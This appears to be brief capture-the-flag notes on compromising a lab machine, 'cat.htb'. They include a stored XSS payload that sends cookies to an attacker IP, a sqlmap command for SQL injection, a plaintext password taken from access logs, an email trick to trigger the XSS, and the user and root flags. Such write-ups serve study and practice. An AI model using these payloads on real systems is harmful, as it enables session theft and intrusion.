Difficulty: Medium
IP: 10.129.234.87
OS: Linux
Category: Web / SQLi / XSS / PrivEsc
Status: ✅ Done
nmap cat.htb
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
.git/ folder discovered → used git-dumper to recover full PHP sourceview_cat.php has stored XSS in username (reflected in DOM)<img src=1 onerror=this.src="http://10.10.xx.xx/?ccc="+encodeURIComponent(document.cookie)>
accept_cat.php: vulnerable catName param$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
config.php → file-based /databases/cat.dbsqlmap to extract user hashessqlmap -u "http://cat.htb/accept_cat.php" --cookie="PHPSESSID=..." --data="catId=1&catName=123" -p catName --dbms=SQLite --level=5
/var/log/apache2/access.logcat /var/log/apache2/access.log | grep axel
GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q
ssh rosa@cat.htb -L 3000:127.0.0.1:3000
/var/mail/axel: send an email to jobert to trigger XSSswaks --to "jobert@localhost" --from "axel@localhost" --header "Click" --body "http://localhost:3000/axel/xss" --server localhost
index.php → password insidecat user.txt
56726c7c53163f6b2cddd30da152a32d
cat root.txt
b6503818144bada3cd5c62210f1427c7